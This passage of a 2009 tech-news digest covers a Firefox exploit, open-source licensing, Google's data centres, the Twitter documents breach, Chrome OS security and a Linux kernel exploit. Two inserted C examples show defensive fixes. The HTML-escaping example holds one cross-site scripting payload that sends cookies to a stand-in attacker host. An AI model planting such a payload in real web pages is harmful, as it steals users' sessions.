Another contributor agreed. "It would seem that the milw0rm exploit code is based on the test cases for this bug," said someone identified only as "WD" in the same Bugzilla thread. "When you look at the crash details in a debugger, it's pretty clear that it's exploitable with a heap spray to the access violation address in question."
The fix has been slated for Firefox 3.5.1, a fast-track update originally scheduled to release in the last two weeks of this month.
That update will be accelerated to plug the just-gone-public hole, said Daniel Veditz, a security lead at Mozilla. "[The bug] was checked in yesterday, a few hours before we learned of the milw0rm posting," Veditz said Tuesday night in a comment on the Mozilla security blog. "This fix was going to be in the 3.5.x update we had scheduled for the end of July, but obviously now we have moved up the schedule for release."
CNet: Apache and the future of open-source licensing
by Matt Asay
If most developers contribute to open-source projects because they want to, rather than because they're forced to, why do we have the GNU General Public License?
That's the question that hit me last night as I tried to sleep in the shadow of Richard Stallman's MIT. Stallman, of course, originated the GPL, a brilliant way to turn copyright on its head in order to force software to remain open.
But in the process, did Stallman simply create an alternative way to release proprietary software?
I'm not trying to be cute here. Think about it. If you want to maximize adoption and reuse of your software, why wouldn't you use the Apache License? Perhaps because you don't like the thought of someone using your free software in a proprietary product?
"I would actually rather nobody use my software than be in a situation where everyone is using my gear, and nobody is admitting it," wrote Zed Shaw, creator of a popular library and Web server for Rails called Mongrel.
Shaw, and perhaps other coders, have turned to the GPL as a way to protect their software from use they deem objectionable. But isn't this precisely what the proprietary software licenses do? The only difference is that the GPL forces code to be open, rather than closed.
Are the two approaches so very different? The effect - blocking undesirable use of one's software - is largely the same.
After 10 years in open source, I'm increasingly of the Apache-licensing persuasion because I'm starting to concur with open-source luminary Eric Raymond that "the GPL is unnecessary...(and) is also a confession of fear and weakness."
If I'm mostly concerned about adoption, Apache promises to be better than the GPL for all the reasons stated by Daniel Jalkut in his excellent ode to Apache.
And if I'm concerned about protection, then why not simply use a proprietary license--one that doesn't scare opposing legal counsel?
With the Web making open-source licensing largely irrelevant, anyway, it's a good time to evaluate the merits of the two dominant open-source-licensing approaches. For this moment in time, they're essentially equivalent, at least to end users and Web developers, neither of which is required to contribute back derivative works.
Indeed, I believe that one of the primary reasons that Linux, MySQL, Lucene, Hadoop, and other Web-oriented technologies have thrived in the past few years is that they have basically come legal-encumbrance-free.
Would Google have built its server infrastructure with Linux if it had been required to contribute all its software back? Almost certainly not. Yes, it has elected to contribute back to MySQL and others when it was advantageous to do so, but I think that Affero GPL, which translates the GPL's provisions to network-hosted software, would have effectively killed the utility of MySQL, Linux, and other open-source technologies for Web titans like Google, Facebook, and others.
In short, perhaps the best thing that could have happened to open source in the past few years is the increasing relevance of its code due to the decreasing relevance of its licensing. More adoption due to fewer controls.
Developers don't contribute to open-source projects out of force. They do so out of interest, desire for recognition, and other reasons. Once you take force out of the equation, the GPL loses its relevance except as a tool to protect against competition...which proprietary licensing perfected long ago.
For those who worry about the world being closed off behind proprietary licenses, it's not going to happen. The software world has been opening up, though not always at the pace some open-source advocates would prefer. On this point Tim O'Reilly has correctly argued:
If you close things off, eventually, you lose. This is why one of my slogans is, "Create more value than you capture." As long as people are doing that, I don't care whether they're trying to capture some value (through proprietary licensing).
In other words, people don't have to be forced into openness. It happens out of natural, selfish desires. Given the history of humanity, that's probably a more dependable basis for business strategy than an expectation of charitable donations through code contributions.
So, whither the GPL? I'm asking a sincere question to which I have hunches but no definitive answers. I'd love to hear your thoughts.
TheRegister: Google data center born without chillers
by Cade Metz
The cooling system inside Google's Belgium data center has no chillers. It uses nothing but outside air - so-called "free-cooling" - to keep temperatures down. And if the Belgian air gets too hot, Google shifts the data center's compute loads to other facilities.
As we reported late last month, Google senior manager of engineering and architecture Vijay Gill alluded to this chiller-less setup during a cloud-happy tech conference in San Francisco. And our piece sparked a follow-up story from our friends at Data Center Knowledge.
According to the site, Google openly discussed its chiller-free facility this spring during a data-center summit inside the Mountain View Chocolate Factory. The Belgium climate can provide free cooling for all but about seven days of the year, the company says, and during those hot summer days, Google offloads the facility's tasks to other custom-built data centers, which now number about 36 worldwide.
The free-cooling idea is hardly unique - the likes of Microsoft and Yahoo! are also working to cut energy costs by using alternative cooling sources - but Google isn't even using chillers as a fall-back.
Google tends to operate its data centers at over 80 degrees Fahrenheit - well above the norm - and according to one former employee, Intel provides the Chocolate Factory with chips that are better able to withstand heat than garden variety Chipzilla processors. But it's unclear how Google's free cooling setup operates. The company did not immediately respond to our request for comment.
Speaking at Structure 09, the wonderfully-witty Vijay Gill seemed to indicate that when there's a temperature spike in the chiller-less data center, its top-secret infrastructure can respond without human intervention.
"You have to have integration with everything right from the chillers down all the way to the CPU," he said. "Sometimes, there's a temperature excursion, and you might want to do a quick load-shedding - a quick load-shedding to prevent a temperature excursion because, hey, you have a data center with no chillers. You want to move some load off. You want to cut some CPUs and some of the processes in RAM."
And he hinted that Google can (almost) instantly shift loads from one data center to another as if moving data between servers. Google likes to think of each data center as one big machine. The Datacenter as a Computer: An Introduction to the Design of Warehouse-Scale Machines is the title of the now-famous paper.
"How do you manage the system and optimize it on a global level? That is the interesting part," Gill continued. "What we've got here [with Google] is massive - like hundreds of thousands of variable linear programming problems that need to run in quasi-real-time. When the temperature starts to excurse in a data center, you don't have the luxury of sitting around for a half an hour...You have on the order of seconds."
But when asked if this technology is in place today, Gill responded in typical Google fashion. "I could not possibly comment on that," he said. Likewise, when The Reg contacted Google today about its chiller-less setup, the company did not immediately respond.
In a March interview with Data Center Knowledge, however, Google senior vice president of operations Urs Holzle indicated that the company uses manual tools for load shifts between data centers. "Teams regularly practice failing out of or routing around specific data centers as part of scheduled maintenance," he said. "Sometimes, we need to build new tools when new classes of problems happen."
And if Google does have automated tools doing this sort of thing, you have to wonder how well they're working. Earlier this year, two much-discussed Gmail outages involved Google shifting loads between data centers. ®
InfoWorld: Theft of Twitter documents from Google Apps raises cloud security concerns
by Jon Brodkin
A hacker has reportedly obtained and distributed more than 300 confidential documents pertaining to Twitter's business affairs. The documents were reportedly stored on Google Apps.
The hacker apparently accessed documents with potentially sensitive information about Twitter employees, company finances, partner agreements, and other topics, and forwarded the documents to media outlets such as TechCrunch, which reported on the data breach Tuesday.
On how the breach occurred, TechCrunch's Michael Arrington writes that "the original security hole seems to be Google, via Google Apps for your Domain. Some passwords were guessed and things started to fall apart from there. Most (or all) of these documents were downloaded from Google's servers."
The exposure has raised ethical questions about whether any or all of the exposed documents should be published. TechCrunch said it would refrain from posting documents relating to individuals who interviewed at Twitter and others that show "floorplans and security passcodes to get into the Twitter offices." But TechCrunch said it will publish some documents "showing financial projections, product plans, and notes from executive strategy meetings."
The exposure is also certain to raise questions about cloud-based services, both in terms of whether the services themselves contain inherent security flaws and whether customers are too trusting and aren't using strong enough passwords.
CNet: 'Free' is(n't) a four-letter word...
by Matt Asay
Just as Amazon and Google are obliterating profit margins for old-school publishers, so, too, is open source putting the squeeze on them, whether in cloud computing or in search or...you name it. As the world digitizes, there's a mad rush to commoditize everyone else's business. This is good for consumers (low prices!) but not so good for vendors (low margins!).
The problem (and promise) of digitization is, of course, "free." Everyone loves to pay "free," but few really enjoy selling it. Or competing with it.
As Bill Gurley suggests: "The key question for anyone in business is, 'Can someone do what you do for free?' If the answer is 'yes' you have a problem." In a digital world, that "problem" is wreaking havoc on an increasing array of industries.
The problem, however, isn't "free." It's that old businesses persist in trying to charge for goods that others give away.
Twitter, for example, may not be making much money from its service, but a host of companies are starting to derive considerable cash from the sale of ancillary software or services, as TechCrunch points out.
Or take the media industry. As Andrew Savikas persuasively argues, media continues to think it's a content business, while the world believes it's a services business.
JP Rangaswami illustrates why:
What if the troglodytes finally began to realise that customers were scarce and digital music was abundant? What if they finally began to realise that downloads were an excellent way to advertise scarce things like concerts and physical memorabilia, as Prince figured out?
And what if the customers have given up and moved on, from the download to the stream?
It was never about owning content. It was always about listening to music.
It was never about product. It was always about service.
The customer is the scarcity.
That scarcity only appears to grow as digital goods proliferate. So much content seeking audience with comparatively few consumers. Something has to give.
That something is, first of all, old business models premised on selling an abundantly available good as if it were scarce. The real model is to foster abundance while selling the scarcity that naturally accompanies it. Google gives away search so that it can help you narrow that search with ads; Red Hat encourages open-source development so that it can boil down that teeming mass of uncertainty to a certified, stable build of Linux; and so on.
Some in the software world don't get this. Microsoft CEO Steve Ballmer can repeat ad infinitum that "We just keep coming and coming and coming" with the same strategy, the same software, the same everything.
But eventually that won't be enough, because even Microsoft's bank balance and "Tenacious. Tenacious. Tenacious" approach can't withstand a perennial battle with 'free' (or enterprise customers' apparent indifference to more of the same). Not unless it can re-learn how to make 'free' work for it, as it has with SharePoint.
The same is true for the media industries as well as new-school software companies like Google. Today's profit center is almost certainly going to be given away by one's competitor.
That's why creative destruction must be creative to pay off. It's what drives innovation. No one is entitled to its business model forever, for which consumers should be very, very grateful.
TheRegister: Webcams, printers, gizmos - the untold net threats
by Dan Goodin
Forget mis-configured Apache servers and vulnerability-laden Adobe applications. The biggest security threats to business and home networks may be the avalanche of webcams, printers, and other devices that ship with embedded web interfaces that can easily be turned against their masters.
The web interfaces are designed to make it easy to manage the devices by allowing people to use a readily familiar medium to change settings such as file names and IP addresses. But there's a catch: The low-cost gadgets were never designed to withstand attacks, even though they interact with some of the most sensitive parts of a computer network, says a team of researchers at Stanford University that tested 21 devices made by 16 different manufacturers.
"We didn't find a single secure device," said Hristo Bojinov, a PhD candidate at Stanford's Computer Security Lab, who plans to present the findings later this month at the Black Hat security conference in Las Vegas. "It tells us that it's a long tail that's completely overlooked right now."
The device that posed the highest number of threats was NAS, or network-attached storage, units, which were susceptible to all five attack classes considered in the study.
For instance, attackers can sabotage NAS units made by one vendor (The Register agreed not to name any specific manufacturers or models in this article) by doing nothing more than entering JavaScript when trying to log in to the device. From then on, the device will execute XSS, or cross-site scripting, attacks against network admins each time they view a device log that stores the wayward login attempts.
Similarly, attackers can manipulate SMB, or server message block, commands to rename files on a NAS device so they contain malicious JavaScript. The Stanford team has dubbed such exploits cross-channel scripting attacks because they use a non-web channel such as SMB or the file transfer protocol to store arbitrary scripts that, when later viewed in a web browser, can expose the admin to serious threats. Four of the five NAS manufacturers studied in the report were vulnerable to them.
Other devices that are vulnerable to cross-channel attacks include network switches, routers, photo frames, voice over internet protocol phones, and so-called LOM, or lights out management, systems for remotely managing servers and other network equipment. Other attack classes detailed in the study included CSRF, or cross-site request forgeries, and unauthorized access of files or device resources.
"What we're talking about here is a fairly global problem," said Bojinov. "Pretty much all vendors we have looked at are affected by this."
The researchers have also modeled web-based exploits that use CSRF attacks to plant an ever-present "ghost" in certain models of photo frames that allow people to use the internet to remotely change the images being displayed. From then on, the device is under the ghost's control, and it can be programmed to send a copy of each picture stored, the times the device is accessed and other potentially sensitive data.
The findings are significant for a couple of reasons. First, once infiltrated, the devices will continue to attack because the malicious scripts reside in configuration pages, device logs, and other pages. Even if an attacked PC is later disinfected, the device may continue to attack new victims. What's more, these devices are generally invisible to anti-virus and other security programs.
Second, the number of electronic devices being shipped with web interfaces has snowballed and is only getting bigger. In the next few years, the number of such gizmos attached to the net will outnumber servers, the researchers say.
And yet few, if any, device manufacturers supply defenses against such attacks.
"At a high level, usually the problems can be fixed by being very careful about escaping the state that device stores, and presents," Bojinov says. "However, given the fact that it is so hard to keep track of all input and output, it is too much to ask each vendor to fix to the problem directly."
As a result, the research team - which also includes Dan Boneh, head of the Applied Cryptography Group in Stanford's Computer Science Department, and Elie Bursztein, a post-doctoral researcher at the Stanford Computer Security Lab - is considering whether it makes sense to build a set of lightweight tools that vendors could include in their wares.
One approach is the creation of a browser extension the team calls a "sitefirewall" that would prevent attacks from using the browser to leak data outside an intranet. The team plans to release a proof-of-concept tool later this year. A second approach is a framework for developing embedded web interfaces that fixes the most common implementation problems.
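The defence Bojinov describes, escaping device-stored state at the point where it is presented, is easy to show in the language most embedded web interfaces are written in. The following is an added example, not code from the Stanford study or from any vendor's firmware: a log-row renderer for a hypothetical NAS admin page, first concatenating a stored username straight into HTML (the cross-channel scripting pattern) and then escaping it. The function names, the HTML fragment and the attacker-supplied username are constructed for this illustration.

```c
/* Added example, not from the Stanford study or any vendor's firmware.
 * Shows how an embedded web UI should escape device-stored state (here a
 * failed-login log entry) before rendering it into HTML. The row layout,
 * function names and sample username are constructed for this example. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Escape the five HTML-significant characters. Returns a malloc'd string
 * that the caller frees, or NULL on allocation failure. */
char *html_escape(const char *in)
{
    size_t out_len = 0;
    for (const char *p = in; *p; p++) {
        switch (*p) {
        case '&':            out_len += 5; break; /* &amp;  */
        case '<': case '>':  out_len += 4; break; /* &lt; &gt; */
        case '"':            out_len += 6; break; /* &quot; */
        case '\'':           out_len += 5; break; /* &#39;  */
        default:             out_len += 1; break;
        }
    }
    char *out = malloc(out_len + 1);
    if (!out)
        return NULL;
    char *q = out;
    for (const char *p = in; *p; p++) {
        const char *rep;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   *q++ = *p;      continue;
        }
        size_t n = strlen(rep);
        memcpy(q, rep, n);
        q += n;
    }
    *q = '\0';
    return out;
}

/* Vulnerable: the stored username goes into the page byte-for-byte, so a
 * login attempt (or an SMB rename, or an FTP upload) that stored a
 * <script> tag runs in the admin's browser when the log is viewed. */
int render_log_row_unsafe(char *buf, size_t buflen, const char *user)
{
    return snprintf(buf, buflen,
                    "<tr><td>login failed</td><td>%s</td></tr>", user);
}

/* Hardened: escape at the output boundary. It does not matter which
 * channel put the bytes into storage; they are rendered as text. */
int render_log_row_safe(char *buf, size_t buflen, const char *user)
{
    char *esc = html_escape(user);
    if (!esc)
        return -1;
    int n = snprintf(buf, buflen,
                     "<tr><td>login failed</td><td>%s</td></tr>", esc);
    free(esc);
    return n;
}

int main(void)
{
    /* Constructed attacker input: what a malicious login attempt stores. */
    const char *user =
        "<script>new Image().src='http://evil.example/?c='+document.cookie</script>";
    char row[512];
    render_log_row_unsafe(row, sizeof row, user);
    printf("unsafe: %s\n", row);
    render_log_row_safe(row, sizeof row, user);
    printf("safe:   %s\n", row);
    return 0;
}
```

The escaping is deliberately done when the page is generated rather than when the data is stored: a log, a file name or a configuration field is written by several channels, and only the HTML renderer knows that the bytes are about to be interpreted as markup.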
InfoWorld: Google Chrome OS can't be perfectly secure
by Roger Grimes
Google's plan to release a Chrome-based OS next year has garnered the expected fanfare that comes with anything the company announces. I've also seen articles in which people at Google are quoted as saying the OS will be free from malware and immune to malicious hackers. My gut feeling is that these folks were misquoted. I don't think anyone with serious experience in this field would make that sort of claim - but I could be wrong.
Whether or not they said it, the question remains: Is it truly possible for the search giant to accomplish what no other company has and release a perfectly secure OS? The answer: Probably not. (For the sake of full disclosure, I'm a security architect at Microsoft.)
For starters, the best indicator of future behavior is past behavior. Every software vendor who has promised perfect security has failed to deliver. Who can forget Oracle CEO Larry Ellison's pledge of "unbreakable software"? That was hundreds, if not thousands, of patched bugs ago. Unlike Oracle's offerings, Chrome OS will be available to and used by the general public, making it a huge target for malicious hackers and purveyors of malware. That alone renders the prospect of flawless security all but impossible.
Second, I don't know of a Google product to date that has not had its share of bugs. Even Google Chrome, the "most secure browser ever," has had at least eight discovered vulnerabilities in its very short life - and with the browser's very small market share. If Google Chrome were to gain market share, more vulnerabilities would naturally emerge. No software has ever escaped that fact.
Secure software is static software
But let's say that Google achieves the near-impossible, what no one else has done, and makes a perfectly secure OS. One of the key challenges for any software title is that as it becomes more popular, it must become more functional. Security alone does not make a product popular. Otherwise, software such as OpenBSD or anything written by Dr. D. J. Bernstein would have a much higher install base. These products are well-regarded for being extremely - though not perfectly - secure. Perhaps these products haven't gained broader acceptance because - I'm waiting for the flame mail - they don't offer the functionality and experience that most users really want. If a company fails to add functionality and features to its wares, its competitors will grab its customers.
However, adding new functionality and new features requires new code, which in turns increases complexity and the chances for security bugs.
For example, Adobe Acrobat was relatively secure when it simply read PDF text documents. To attract more customers and remain competitive, Adobe added a bunch of new features, such as the ability to run JavaScript and participate in encryption. By no small coincidence, Adobe Acrobat now has lots of security patches. You can say the same of any popular app.
Further, even if Google somehow manages to crank out a perfectly secure OS, it will still need to rely upon other organizations' software to work. That, in turn, will almost certainly create chinks in the OS's armor. For example, almost every Internet product relies on DNS, which has proved extremely hackable. Hack that, and you hack everything that relies on it, including otherwise secure browsers and OSes.
Beyond relying on DNS, how will the Google OS and browser render documents and content such as PDFs, Macromedia Flash files, iTunes music, and all other code and content that makes up the rich Internet experience? Google developers will have a hard time delivering all that functionality themselves. They would have to perfectly code every (or at least the most popular) content-type rendering engines. More than likely, Google will allow other vendors' products to interact with their products, and that brings up dozens of security issues in a given month.
I'm even ignoring for the moment the reports that the Google OS will be a Linux variant. Linux itself has many kernel bugs a year. Google Chrome, the browser, relies upon other components (such as Web Toolkit) which have their own vulnerabilities.
There are other hard questions: How will people be able to save content between sessions or send each other files? How will Google be able to perfectly distinguish between malicious and legitimate file attachments when no other company has been able to do it?
Allow users to save content on the local machine and you've opened up a potential security hole. Only allow objects to be saved in the cloud, and the cloud becomes the target. Heck, most of the cloud vendors are still trying to come to grips with what securing the cloud even means, much less having a perfectly secure cloud.
Google can only accomplish a perfectly secure OS by coding with zero bugs (which has never been done and will never be done), by interacting with perfectly secure third-party products (which don't exist), and/or by providing less functionality and customization to its customers. That's a tall order and a prescription for strong competition, because no matter what we believe, customers really don't want perfectly secure software - at least not at the expense of rich features.
To its credit, Google does have a better-than-average chance of making a relatively more secure OS. Google developers don't have the incredible backward-compatibility issues that Windows, Linux, and BSD product teams must deal with. Google has a chance to strike out on its own and support what it wants to support. The company did something similar with the Chrome browser. But again, Google's previous security track record indicates that perfect security - even with less functionality - will be difficult.
A Google Chrome OS could be successful for a lot of other reasons, and I applaud Google for its initiative and innovation. (By the way, congrats for Gmail coming out of beta!) I'm always a believer in more competition. It improves everyone's product and usually benefits the customer. But after spending 23 years in the computer industry and hearing the repeated false promises of "perfect security," please excuse me if I'm skeptical.
Processor.com: Storage Encryption Strategies
by George Crump
When it comes to storage encryption, the primary concern is protecting data as it leaves the trusted environment of your data center. There are three primary cases when this occurs; users taking data out of the environment on USB memory sticks, external hard drives, and laptops; data being moved offsite for long-term storage or protection from disaster; and when storage systems are decommissioned. There is also the case of storage being encrypted as an extra level of security within the trusted environment. In all cases, encryption needs to be applied in a way that is effective yet unobtrusive to business operations.
User Storage
Today's workforce is becoming more and more mobile, with employees working from home or on the road via laptops and USB drives. Given the risk of the devices being lost or stolen, there must be safeguards put in place to make sure that the data can't be read.
"At the device level, companies and government agencies are requiring that users utilize portable storage devices that utilize encryption," says Gary Streuter, vice president of marketing at CMS Products (www.cmsproducts.com). "These devices basically work by setting a password for the device so that when it is plugged in to a USB port, the user is prompted for the password, [and] after so many—typically five—failed attempts, access to the device is denied, and in some cases it will erase itself."
For laptops, there is the typical security of logging in to the system, but Streuter advises that may not be enough. "Often users will either have their systems set for auto-login or create very simple passwords that are easy to defeat," he says. For laptops, shared computers at home, and even shared drives on a corporate file server, Streuter recommends the use of a software application that can encrypt the data on laptop drives or in folders on shared systems to provide a second challenge for access.
These systems can also be set for a time-out value that will require reauthentication after a period of inactivity, putting the system to sleep or shutting it down. Such software protects highly sensitive data from an internal breach as well as a user walking away from a machine and forgetting to log out.
Data Center Storage
The primary focus for encrypting data center storage should be as it leaves the trusted environment either for long-term storage or when it is decommissioned. Encryption often is not effective against internal threats such as those from internal IT staff or external maintenance providers because they have been authorized and placed in the trusted environment.
Jose Carreon, product marketing manager for security technologies at Brocade (www.brocade.com), suggests that primary storage should be the critical focal point for storage managers. "Primary storage is always the most important to encrypt [because] it is the storage layer where most of the dynamic sensitive data resides," he says. "For example, assume credit card information that gets accessed and processed every second of the IT working day . . . has to be protected while in transit and at rest."
According to Kevin Bocek, director of product marketing for Thales Information Systems Security (iss.thalesgroup.com), there are four primary ways that users can encrypt data center storage in transit or at rest: application-based encryption, which encrypts data as the application writes it to storage; host bus adapter-based encryption via a storage card, which encrypts data as it leaves the host on its way to storage; SAN-based encryption, which encrypts data as it enters the storage fabric; and encryption at the array or drive level.
"Each of these methods has its advantages," says Bocek. "Encrypting at the application level makes sure that data is encrypted as it is written to the storage system, but applications need to be rewritten to take advantage of that; additionally, it is sometimes difficult to determine what data should and should not be encrypted. In similar fashion, HBA-based encryption is ideal if just a few applications on a few servers need encryption, but in today's environment, with server virtualization, it may be hard to isolate the application. Additionally, the cost of replacing cards could be expensive if many servers need encryption. Encrypting in the storage fabric provides [broader] encryption without having to change the application or the HBA cards. Finally, storage again can encrypt everything broadly, but it requires replacing the current tape or storage solution."
Bocek believes that for many customers, encrypting at the fabric through either a specific appliance or switch provides the right balance of broad encryption without disruption or replacement of key components in the environment.
Brocade's Carreon agrees that fabric-based encryption may be the most suitable location for most customers. "Encryption technologies typically have a serious impact on systems when deployed in software. When encryption is implemented in hardware, the scenario is very different in that you deploy dedicated and highly optimized encryption devices that can deliver from 48 up to 96Gbps of encryption processing, enabling customers to choose to encrypt all data if they desire to do so."
Archive Storage
Another key area for encryption strategy is archiving data that needs to be maintained for adherence to specific industry regulations or for disaster recovery purposes. According to Jered Floyd, CTO of Permabit Technologies (www.permabit.com), this creates an unusual dichotomy. "On one hand, the data has to be retained for years and be readily accessible. On the other, it is often data that needs to be encrypted in case of loss." Floyd suggests that the encryption in this case needs to be handled exclusively by the device because it potentially will outlive any primary storage encryption strategy put in place.
Decommissioning of older storage is another situation where data leaves the building, which can be of concern if the data is replicated to an untrusted environment. "Most disk archive customers will replicate their archive storage to another facility, [but] some of those customers may put that into a hosting facility that is outside of the organization's trusted environment," Floyd says.
In either case, Floyd suggests the strategy of having the encryption intelligence stay with the archive. A storage shelf pulled from the archive is no longer able to see the encryption keys, and as a result, data cannot be read. In the situation where replication is to an untrusted remote site, there should be the option to not replicate the keys, and as a result, data cannot be read by the hosting company's staff.
What To Encrypt?
Beyond protecting data that is leaving the environment, the key decision that most customers need to make is what data to encrypt. According to Brocade's Carreon, "The simplest approach may be to encrypt all the data. Otherwise, any company with requirements for compliance to federal and industry mandates needs an assessment of their data that is typically accomplished through a data classification exercise."
He continues, "Once you identify sensitive data, where it lives, and who owns it, you have to then define the relevant policies for enforcing the encryption and data center security requirements. Products that enable customers to have the flexibility and choice to encrypt all data without any impact to the day-to-day operational environment may be a safer and a simpler approach."
TheRegister: Intel to deliver Postville in August
by Chris Mellor
Details of Intel's biggest solid-state drive so far, a 320GB part built on its 34nm process, are popping up across the web.
The current X18-M and X25-M models come in 80GB and 160GB capacities, use 2-bits-per-cell multi-level cell (MLC) technology and are built on a 50nm process. The single-level cell (SLC - one bit per cell) technology X25-E goes faster and has 32GB and 64GB capacities.
Moving to a smaller process technology will enable more SSD dies to be made at a lower cost per die and a higher capacity. Previous reports have noted that Intel could announce doubled capacity SSDs in August and that Intel partner Micron has introduced flash chips using a 34nm process.
A Canadian RedFlagDeals technology website expects an announcement within a week and says there will be 80GB, 160GB and 320GB models. The consumer and mobile PC models will feature a 32MB wear-levelling buffer, 90MB/sec sequential write performance, 128-bit AES encryption, advanced NCQ features with enhanced performance through status aggregation, and advanced SMART support, meaning improved drive statistics to monitor drive life.
Workstation and server models will additionally have a Power Safe write cache and, possibly, faster I/O speed.
RedFlagDeals suggests the 80GB models will be priced in the $276 - $261 area and says the new SSDs will be cheaper than the outgoing ones, being competitive with Samsung SSDs, and faster. Another etailing site suggests €205 for the 80GB X25-M Postville and €405 for the 160GB version, with delivery in up to ten working days.
We might expect generation 2 X25-M and X18-M 80GB, 160GB and 320GB models with 2-bit MLC flash. Logically there would also be a gen 2 X25-E variant at 32GB, 64GB and now 128GB capacity levels using SLC flash. ®
InfoWorld: Microsoft vs. Apple: The battle rages on
by Robert X. Cringely
Some fights are just classics: Ali vs. Frazier. The Jedi Knights vs. The Empire. Godzilla vs. Rodan. And, of course, Microsoft vs. Apple.
Admittedly, there's been a lull in the action over the past decade. Apple essentially ceded the business PC space to Windows, while Microsoft can't make a product consumers actually want to buy no matter how many billions they throw at it. (OK, one: the Xbox. Otherwise, nada.)
Suddenly, though, they're at it hammer and tongs, just like the good old/bad old days. Who's winning? That depends on whom you ask. According to MacWorld's Dan Moren, Microsoft is "running scared":
Apple has gained a lot of traction over the past decade. The iPod pushed the company back into the mainstream, and Cupertino only continued gaining currency as Mac OS X matured and it released some of the slickest machines around. Add in Microsoft's own problems dealing with Windows XP and its less-than-stellar successor, Vista, and Microsoft has started seeming like a non-entity these days.
On the other hand, PC Advisor's Simon Jary suggests Microsoft is now winning against both Apple and Google:
Apple appears rattled. And maybe Google is a little scared now that Microsoft has announced that it is to launch free online versions of its mighty Office applications.... When things looked bleakest for Microsoft the old giant has suddenly roared back to life, and it's Apple and Google who are left looking like frightened little boys just moments after apparently slaying the beast.
My take? Well, people still buy nine Windows machines for every Mac. The big reason? As those "laptop hunters" ads say, you get a lot more for your money from a Windows machine (including frustration). And the message appears to be getting through; a year ago, Apple was the No. 3 PC maker in the United States, according to IDC. Now it's slipped to No. 5.
On the other hand, Microsoft can't make a dent in Apple's stranglehold on the portable music market or touch Apple's technology lead in handsets. But worse than that, consumers love Apple the way they love puppies and ice cream. Aside from a handful of apoplectic fanboys, people barely tolerate Microsoft. And it's only getting worse. According to VendorRate, Microsoft's customer satisfaction among IT pros dropped like a rock over the past three months.
This week at Microsoft's worldwide partner confab in New Orleans, Chief Operating Officer Kevin Turner threw another jab at Apple, sharing this nifty little anecdote:
...two weeks ago we got a call from the Apple legal department saying, "Hey, you need to stop running those ads, we lowered our prices." They took like $100 off or something. It was the greatest single phone call in the history that I've ever taken in business.
I did cartwheels down the hallway. At first I said, "Is this a joke? Who are you?" Not understanding what an opportunity. And so we're just going to keep running them and running them and running them.
As PC World's Nick Mediati notes, Apple did drop its prices in early June, making those "laptop hunter" ads a little off target - the most likely reason Apple's legal beagles gave Turner a jingle. Even at $1,499 instead of $1,799, though, MacBooks still aren't exactly what you would call a steal.
Turner also announced Microsoft was planning to locate its own chain of retail shops in spitting distance of Apple Stores - and, when possible, right next door. That ought to make for an interesting photo op, when there's a line around the block for the next iPhone and the Microsoft store is as quiet as a church.
Microsoft competes with everyone, so it needs to worry about everyone (but mostly about Google). Apple really competes only with itself. Think about it another way: Microsoft is trying to make a comeback in public perception by picking on somebody it's already beating in its primary market by a ratio of almost 10 to 1.
So this battle is really more like Godzilla vs. Bambi. But even if Microsoft manages to squash Apple into a deer-sized pancake, it will never win the battle for the hearts and minds of consumers. Because nobody loves the big scary lizard.
CNet: Linux exploit gets around security barrier
by Tom Espiner
A security researcher has released zero-day code for a flaw in the Linux kernel, saying that it bypasses security protections in the operating system.
The source code for the exploit was made available last week by researcher Brad Spengler on the Dailydave mailing list. According to the researcher, the code exploits a vulnerability in Linux kernel versions 2.6.30 and 2.6.18, and works on both 32-bit and 64-bit systems. The 2.6.18 kernel is used in Red Hat Enterprise Linux 5.
The exploit bypasses the null-pointer dereference protection in the mainline kernel, which could allow an attacker to gain root control of a system, Spengler wrote.
It also uses its arbitrary code execution in the kernel to disable security features such as auditing, Security-Enhanced Linux (SELinux), AppArmor and the Linux Security Module framework, while making applications running outside the kernel believe that SELinux is still operating.
In the notes for his source code, Spengler said the exploit is strengthened if SELinux is applied to the operating system. SELinux is a set of modifications that can be applied to the kernel to harden it, by providing a set of security policies.
"Having SELinux enabled actually weakens system security for these kinds of exploits," he wrote.
Security training organization the Sans Institute called the exploit "fascinating." In a blog post on Friday, Sans Institute incident handler Bojan Zdrnja said that the exploit takes advantage of an optimization performed by the compiler used to build the kernel.
"The compiler will introduce the vulnerability to the binary code, which didn't exist in the source code," wrote Zdrnja. "This will cause the kernel to try to read/write data from 0x00000000, which the attacker can map to userland--and this finally pwns the box."
In his notes on the source code, Spengler said that a workaround would be for administrators to compile the kernel with the -fno-delete-null-pointer-checks flag, which stops GCC from removing null-pointer checks that follow a dereference.
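The source pattern Zdrnja describes, a pointer dereferenced first and tested for NULL afterwards, can be reproduced in user space. The following is an added example written for this page, not Spengler's exploit code and not the kernel function it targets: the struct names, function names and return codes are invented, and the program only demonstrates the two orderings side by side with a valid pointer. With GCC's -fdelete-null-pointer-checks in effect (the default at -O2), the later `if (!tun)` in the vulnerable version may be compiled out, which is exactly the check that -fno-delete-null-pointer-checks preserves.

```c
/* Added example, not Spengler's exploit code. Reproduces in user space the
 * source pattern the article describes: a pointer is dereferenced before it
 * is checked for NULL. In C the early dereference is undefined behaviour if
 * the pointer is NULL, so GCC's -fdelete-null-pointer-checks (on by default
 * at -O2) treats it as proof that the pointer is non-NULL and may delete the
 * later check. In the kernel, with page zero mapped by an attacker, the read
 * of address 0 then returns attacker-controlled data instead of faulting.
 * The struct and function names here are invented for this illustration. */
#include <stddef.h>
#include <stdio.h>

struct sock { int readable; };
struct tun  { struct sock *sk; int flags; };

enum { POLL_NONE = 0, POLL_IN = 1, POLL_ERR = 8 };

/* Vulnerable ordering: tun->sk is read before tun is tested. Built with
 * -O2 the 'if (!tun)' below may be removed as dead code; passing NULL
 * reads address offsetof(struct tun, sk) == 0. Never call it with NULL. */
int poll_vulnerable(struct tun *tun)
{
    struct sock *sk = tun->sk;   /* dereference first */
    if (!tun)                    /* check second: useless to the optimizer */
        return POLL_ERR;
    return sk->readable ? POLL_IN : POLL_NONE;
}

/* Fixed ordering: check, then dereference. The check precedes every use,
 * so no compiler flag is needed to keep it. */
int poll_fixed(struct tun *tun)
{
    if (!tun)
        return POLL_ERR;
    struct sock *sk = tun->sk;
    return sk->readable ? POLL_IN : POLL_NONE;
}

int main(void)
{
    struct sock s = { 1 };
    struct tun  t = { &s, 0 };
    printf("vulnerable(valid) = %d\n", poll_vulnerable(&t));
    printf("fixed(valid)      = %d\n", poll_fixed(&t));
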